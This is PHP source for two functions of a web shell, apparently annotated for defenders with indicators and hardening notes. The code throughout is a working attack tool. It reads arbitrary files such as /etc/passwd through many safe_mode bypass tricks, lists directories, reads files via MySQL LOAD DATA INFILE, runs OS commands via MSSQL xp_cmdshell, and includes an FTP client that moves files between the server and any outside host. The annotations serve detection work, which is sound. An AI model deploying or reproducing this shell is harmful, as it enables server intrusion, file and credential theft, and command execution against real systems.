/**
 * Web-shell panel: reads files, lists directories and runs database-backed
 * commands, driven entirely by $_REQUEST, then renders the HTML forms.
 *
 * No authentication or authorization check is visible in this function; any
 * caller that reaches it controls every input below.
 *
 * Branch taken (first match wins):
 *  - `read`  : tries a series of file-read techniques on $_REQUEST['file']
 *              (default /etc/passwd) and echoes each result.
 *  - `show`  : lists paths matching "{$file}*" via glob(), imap_list() and
 *              Windows shell helpers.
 *  - `sql`   : connects to MySQL on localhost with request-supplied
 *              credentials and reads the file with LOAD DATA INFILE.
 *  - `serveR` + `coM` + `dB` + `useR` + `pasS` : connects to MSSQL and passes
 *              `coM` to master.dbo.xp_cmdshell.
 *
 * Indicators visible in this code (for log and file-system hunting):
 *  - request parameters `read`, `show`, `sql`, `file`, `user`, `pass`, `db`
 *    and the mixed-case `serveR`, `useR`, `pasS`, `coM`, `dB`;
 *  - files: /tmp/mb_send_mail, a tempnam() file with prefix "cx", and a
 *    short-lived php.ini containing "safe_mode = Off" in the working directory;
 *  - database: tables named by uniqid('N') / uniqid('NJ'), LOAD DATA INFILE,
 *    and master.dbo.xp_cmdshell.
 *
 * Runtime note: safe_mode was removed in PHP 5.4 and the mysql_* / mssql_*
 * extensions in PHP 7.0, so those paths only run on legacy runtimes.
 *
 * comshelL(), winshelL(), srvshelL() and checkfunctioN() are defined outside
 * this block; from their call sites they appear to run a command line and
 * test function availability respectively -- confirm against their source.
 */
function safemodE()
{
    // $t, $hcwd and $et are interpolated into the HTML below; $windows is not
    // used in this function. All four are set elsewhere in the file.
    global $windows, $t, $hcwd, $et;
    // Target path is attacker-controlled; falls back to /etc/passwd.
    $file = empty($_REQUEST['file']) ? '/etc/passwd' : $_REQUEST['file'];
    // HTML fragments wrapped around each "Method N:(name)" label.
    $pr = "\r\n</font><font color=green>Method ";
    $po = ")</font><font color=blue>\r\n";
    // Running method number printed in the labels.
    $i = 1;
    if (!empty($_REQUEST['read'])) {
        // Method: reset safe_mode / open_basedir to their ini defaults, then read.
        echo "<pre>{$pr}{$i}:(ini_restore{$po}";
        ini_restore('safe_mode');
        ini_restore('open_basedir');
        readfile($file);
        $i++;
        // Method: include the path. Unlike the other reads, include also
        // executes any PHP code the target file contains.
        echo "{$pr}{$i}:(include{$po}";
        include $file;
        $i++;
        // Method: copy through the compress.zlib:// stream wrapper into a temp
        // file (prefix "cx"), then print it. The temp file is not deleted here.
        echo "{$pr}{$i}:(copy{$po}";
        $tmp = tempnam('', 'cx');
        copy('compress.zlib://' . $file, $tmp);
        $fh = fopen($tmp, 'r');
        $data = fread($fh, filesize($tmp));
        fclose($fh);
        echo $data;
        $i++;
        if (function_exists('mb_send_mail')) {
            // Method: pass extra command-line parameters to the mail binary via
            // the 5th argument, with /tmp/mb_send_mail as the output path.
            // The argument is single-quoted, so it is a fixed literal string
            // and can be matched as a static signature.
            echo "{$pr}{$i}:(mb_send_mail{$po}";
            if (file_exists('/tmp/mb_send_mail')) {
                unlink('/tmp/mb_send_mail');
            }
            mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail');
            readfile('/tmp/mb_send_mail');
            $i++;
        }
        if (function_exists('curl_init')) {
            // Method [A]: fetch the path through cURL's file:// scheme.
            echo "{$pr}{$i}:(curl_init [A]{$po}";
            $fh = curl_init('file://' . $file . '');
            $tmp = curl_exec($fh);
            echo $tmp;
            $i++;
            // Method [B]: file:// URL built from the target path with this
            // script's own path (__FILE__) appended, with or without a long
            // "../" run depending on whether $file contains a separator.
            echo "{$pr}{$i}:(curl_init [B]{$po}";
            $i++;
            if (strstr($file, DIRECTORY_SEPARATOR)) {
                $ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__);
            } else {
                $ch = curl_init('file://' . $file . "" . __FILE__);
            }
            var_dump(curl_exec($ch));
        }
        if (is_writable('.')) {
            // Method: drop a php.ini with "safe_mode = Off" into the working
            // directory, read the file, then remove the php.ini again. A
            // php.ini appearing and vanishing in a web directory is an indicator.
            echo "{$pr}{$i}:(php.ini{$po}";
            file_put_contents('php.ini', 'safe_mode = Off');
            readfile($file);
            unlink('php.ini');
            $i++;
        }
        // COM is a Windows-only extension class; no existence check is visible here.
        if (is_object($ws = new COM('WScript.Shell'))) {
            // Method: run `type "<file>"` through a WScript.Shell COM object.
            // $file is placed into the command line unescaped.
            echo "{$pr}{$i}:(COM{$po}";
            echo $exec = comshelL("type \"{$file}\"", $ws);
            $i++;
        }
        if (checkfunctioN('win_shell_execute')) {
            // Method: same `type` command via the win32std helper.
            echo "{$pr}{$i}:(win32std{$po}";
            echo winshelL("type \"{$file}\"");
            $i++;
        }
        if (checkfunctioN('win32_create_service')) {
            // Method: same `type` command via the win32service helper.
            echo "{$pr}{$i}:(win32service{$po}";
            echo srvshelL("type \"{$file}\"");
            $i++;
        }
        if (function_exists('imap_open')) {
            // Method [A]: open /etc/passwd as an IMAP mailbox and list mailboxes
            // using $file as the reference.
            echo "{$pr}{$i}:(imap [A]{$po}";
            $str = imap_open('/etc/passwd', '', '');
            $list = imap_list($str, $file, '*');
            // This loop reuses $i as its index, so the method numbers printed
            // after this point no longer continue the earlier sequence.
            for ($i = 0; $i < count($list); $i++) {
                echo $list[$i] . "\n";
            }
            imap_close($str);
            $i++;
            // Method [B]: open the target path itself as a mailbox and print
            // the body of message 1.
            echo "{$pr}{$i}:(imap [B]{$po}";
            $str = imap_open($file, '', '');
            $tmp = imap_body($str, 1);
            echo $tmp;
            imap_close($str);
            $i++;
        }
        if ($file == '/etc/passwd') {
            // Method: only for the default target. Walks uids 0..99998 with
            // posix_getpwuid() and prints each entry's fields colon-separated,
            // without opening the file itself. A line break is echoed for
            // every uid, including those with no account.
            echo "{$pr}{$i}:(posix{$po}";
            for ($uid = 0; $uid < 99999; $uid++) {
                $h = posix_getpwuid($uid);
                if (!empty($h)) {
                    foreach ($h as $v) {
                        echo "{$v}:";
                    }
                }
                echo "\r\n";
            }
        }
        echo "\n</pre></font>";
    } elseif (!empty($_REQUEST['show'])) {
        // Directory listing: glob() with $file as a prefix pattern.
        echo "<pre>{$pr}{$i}:(glob{$po}";
        $con = glob("{$file}*");
        foreach ($con as $v) {
            echo "{$v}\n";
        }
        $i++;
        if (function_exists('imap_open')) {
            // Listing via imap_list(); $file may carry "reference|pattern".
            echo "{$pr}{$i}:(imap{$po}";
            $str = imap_open('/etc/passwd', '', '');
            $s = explode("|", $file);
            if (count($s) > 1) {
                $list = imap_list($str, trim($s[0]), trim($s[1]));
            } else {
                $list = imap_list($str, trim($str[0]), '*');
            }
            // As in the read branch, this loop overwrites the method counter $i.
            for ($i = 0; $i < count($list); $i++) {
                echo "{$list[$i]}\r\n";
            }
            imap_close($str);
            $i++;
        }
        // COM is a Windows-only extension class; no existence check is visible here.
        if (is_object($ws = new COM('WScript.Shell'))) {
            // Listing via `dir "<file>"` through WScript.Shell; tabs are
            // stripped from the output before printing.
            echo "{$pr}{$i}:(COM{$po}";
            $exec = comshelL("dir \"{$file}\"", $ws);
            $exec = str_replace("\t", '', $exec);
            echo $exec;
            $i++;
        }
        if (checkfunctioN('win_shell_execute')) {
            echo "{$pr}{$i}:(win32std{$po}";
            echo winshelL("dir \"{$file}\"");
            $i++;
        }
        if (checkfunctioN('win32_create_service')) {
            echo "{$pr}{$i}:(win32service{$po}";
            echo srvshelL("dir \"{$file}\"");
            $i++;
        }
        echo "\n</pre></font>";
    } elseif (!empty($_REQUEST['sql'])) {
        // File read through the database server: create a temporary table,
        // LOAD DATA INFILE the path into it, select it back. The read happens
        // with the MySQL server's file access, not PHP's, and needs an account
        // allowed to use LOAD DATA INFILE -- a reason to keep the FILE
        // privilege away from web-application accounts.
        // Host is fixed to localhost; user, pass and db come from the request.
        $ta = uniqid('N');
        $s = array("CREATE TEMPORARY TABLE {$ta} (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE {$ta}", "SELECT * FROM {$ta}");
        $l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
        mysql_select_db($_REQUEST['db'], $l);
        echo '<pre><font color=blue>';
        // Return values are not checked; every statement's result is fed to
        // mysql_fetch_row() regardless of whether it produced a result set.
        foreach ($s as $v) {
            $q = mysql_query($v, $l);
            while ($d = mysql_fetch_row($q)) {
                echo htmlspecialchars($d[0]);
            }
        }
        echo '</pre></font>';
    } elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) {
        // OS command execution through SQL Server: `coM` is concatenated
        // unescaped into an xp_cmdshell call and its output captured in a
        // scratch table named by uniqid('NJ'), which is dropped afterwards.
        // pasS only needs to be set, so an empty password is accepted.
        // Keeping xp_cmdshell disabled and auditing its use limits this path.
        $res = '';
        $tb = uniqid('NJ');
        $db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']);
        mssql_select_db($_REQUEST['dB'], $db);
        mssql_query("create table {$tb} ( string VARCHAR (500) NULL)", $db);
        mssql_query("insert into {$tb} EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db);
        $re = mssql_query("select * from {$tb}", $db);
        while ($row = mssql_fetch_row($re)) {
            $res .= $row[0] . "\r\n";
        }
        mssql_query("drop table {$tb}", $db);
        mssql_close($db);
        // Command output is written into the textarea without HTML escaping.
        echo "<center><textarea rows='18' cols='64'>{$res}</textarea></center><br>";
    }
    // Form defaults: previously submitted values (HTML-escaped) or hard-coded
    // fallbacks. The fallback strings 'cbfteam', '123456' and 'test' appear
    // verbatim in the rendered page and can serve as content signatures.
    $f = !empty($_REQUEST['file']) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd';
    $u = !empty($_REQUEST['user']) ? htmlspecialchars($_REQUEST['user']) : 'cbfteam';
    $p = !empty($_REQUEST['pass']) ? htmlspecialchars($_REQUEST['pass']) : '123456';
    $d = !empty($_REQUEST['db']) ? htmlspecialchars($_REQUEST['db']) : 'test';
    // Three POST forms: "Use PHP Bugs" (read/show), "Use MySQL" (sql) and
    // "MSSQL Exec". Passwords are rendered in plain type=text inputs.
    echo "<center>{$t}Use PHP Bugs:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='{$f}' name=file size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>{$hcwd}<input class=buttons type=submit name=read value='Read File'><input class=buttons type=submit name=show value='Show directory'></form>{$et}<br>{$t}Use MySQL:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='{$f}' name=file size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=user value='{$u}'></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pass value='{$p}'></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text name=db value='{$d}'></td></tr><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>{$hcwd}<input class=buttons type=submit name=sql value='Read'></form>{$et}<br>{$t}MSSQL Exec:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";
    // MSSQL form fields: echo the submitted value escaped, else a default
    // ('localhost', 'sa', empty password, 'dir c:', 'master').
    if (!empty($_REQUEST['serveR'])) {
        echo htmlspecialchars($_REQUEST['serveR']);
    } else {
        echo 'localhost';
    }
    echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";
    if (!empty($_REQUEST['useR'])) {
        echo htmlspecialchars($_REQUEST['useR']);
    } else {
        echo 'sa';
    }
    echo "' size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pasS value='";
    if (!empty($_REQUEST['pasS'])) {
        echo htmlspecialchars($_REQUEST['pasS']);
    }
    echo "' size=35></td></tr><td width='20%' bgcolor='#808080'>Command:</td><td bgcolor='#808080'><input type=text name=coM value='";
    if (!empty($_REQUEST['coM'])) {
        echo htmlspecialchars($_REQUEST['coM']);
    } else {
        echo 'dir c:';
    }
    echo "' size=35></td></tr><tr><td bgcolor='#666666'>Database:</td><td bgcolor='#666666'><input type=text name=dB value='";
    if (isset($_REQUEST['dB'])) {
        echo htmlspecialchars($_REQUEST['dB']);
    } else {
        echo 'master';
    }
    echo "'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{$hcwd}<input class=buttons type=submit value='Execute'></form>{$et}</center>";
}
/**
 * Web-shell panel: a browser-driven FTP client that connects from the web
 * server to a request-supplied host and moves files between the two.
 *
 * With `hosT`, `useR` and `pasS` present (and ftp_connect available per
 * checkfunctioN(), defined outside this block) it logs in, optionally changes
 * the remote directory, performs one file operation, and renders a two-column
 * listing of the remote directory and the local $cwd. Otherwise it renders
 * the connection form.
 *
 * No authentication or authorization check is visible in this function.
 *
 * Defender notes:
 *  - this gives the web server process an outbound FTP channel (port 21) to
 *    an arbitrary host, usable for pulling files onto the server or pushing
 *    local files off it; egress filtering and alerting on FTP connections
 *    originating from web servers covers it;
 *  - request parameters `hosT`, `useR`, `pasS`, `PWD`, `filE`, `modE`, `geT`,
 *    `puT`, `rM`, `mD`, `workingdiR` are distinctive in access logs;
 *  - the FTP password is written back into the page in a hidden field, and
 *    host, user, password, paths and listing entries are echoed without HTML
 *    escaping.
 */
function ftpclienT()
{
    // $cwd is the local directory listed in the right-hand column; $hcwd is
    // an HTML fragment inserted into the connection form. Both set elsewhere.
    global $cwd, $hcwd;
    // pasS only needs to be set, so an empty password is accepted.
    if (!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && checkfunctioN('ftp_connect')) {
        $user = $_REQUEST['useR'];
        $pass = $_REQUEST['pasS'];
        $host = $_REQUEST['hosT'];
        // Fixed port 21, 10-second connect timeout.
        $con = ftp_connect($_REQUEST['hosT'], 21, 10);
        if ($con) {
            if (ftp_login($con, $user, $pass)) {
                if (!empty($_REQUEST['PWD'])) {
                    ftp_chdir($con, $_REQUEST['PWD']);
                }
                if (!empty($_REQUEST['filE'])) {
                    // The same request-supplied name is used for both the
                    // local and the remote side of each transfer.
                    $file = $_REQUEST['filE'];
                    // Presence of modE (the "Binary" checkbox) selects binary mode.
                    $mode = isset($_REQUEST['modE']) ? FTP_BINARY : FTP_ASCII;
                    if (isset($_REQUEST['geT'])) {
                        // Download: remote file -> local file of the same name.
                        ftp_get($con, $file, $file, $mode);
                    } elseif (isset($_REQUEST['puT'])) {
                        // Upload: local file -> remote file of the same name.
                        ftp_put($con, $file, $file, $mode);
                    } elseif (isset($_REQUEST['rM'])) {
                        // Remove on the remote side: tries both the directory
                        // and the file form; results are not checked.
                        ftp_rmdir($con, $file);
                        ftp_delete($con, $file);
                    } elseif (isset($_REQUEST['mD'])) {
                        ftp_mkdir($con, $file);
                    }
                }
                // Gather remote cwd + raw listing and open the local directory.
                // Neither the FTP connection nor the directory handle is
                // closed in this function.
                $pwd = ftp_pwd($con);
                $dir = ftp_rawlist($con, '-la .');
                $d = opendir($cwd);
                // Header row: remote host | local server address.
                echo "<table border=0 cellspacing=0 cellpadding=0><tr><th>{$host}</th><th>";
                if (!empty($_SERVER['SERVER_ADDR'])) {
                    echo $_SERVER['SERVER_ADDR'];
                } else {
                    echo '127.0.0.1';
                }
                echo "</th></tr><form method=POST><tr><td><input type=text value='{$pwd}' name=PWD size=50><input value=Change class=buttons type=submit></td><td><input size=50 type=text value='{$cwd}' name=workingdiR><input value=Change class=buttons type=submit></td></tr><tr><td>";
                // Left column: raw remote listing lines, echoed unescaped.
                foreach ($dir as $n) {
                    echo "{$n}<br />";
                }
                echo "</td><td>";
                // Right column: local directory entries, skipping . and ..
                // The loop stops on any falsy entry name returned by readdir().
                while ($cdir = readdir($d)) {
                    if ($cdir != '.' && $cdir != '..') {
                        echo "{$cdir}<br>";
                    }
                }
                // Action row; credentials and host are carried forward in
                // hidden fields so each action re-authenticates.
                echo "</td></tr><tr><td colspan=2>Name:<input type=text name=filE><input type=checkbox style='border-width:1px;background-color:#333333;' name=modE value=1>Binary <input type=submit name=geT class=buttons value=Get><input type=submit name=puT class=buttons value=Put><input type=submit name=rM class=buttons value=Remove><input type=submit name=mD class=buttons value='Make dir'></td><td><input type=hidden value='{$user}' name=useR><input type=hidden value='{$pass}' name=pasS><input type=hidden value='{$host}' name=hosT></form></tr></td></table>";
            } else {
                echo "Wrong username or password!";
            }
        } else {
            echo "Can not connect to server!";
        }
    } else {
        // Connection form with defaults localhost / anonymous; the password
        // is a plain type="text" input.
        echo '
<form name=client method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">FTP client</label>
</div><div class="fieldwrapper">
<label class="styled">Server:</label>
<div class="thefield">
<input type="text" name="hosT" value="localhost" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="useR" value="anonymous" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password:</label>
<div class="thefield">
<input type="text" name="pasS" value="*****@*****.**" size="30" />
</div>
</div>
' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" value="Connect" style="margin-left: 150px;" />
</div></form>';
    }
}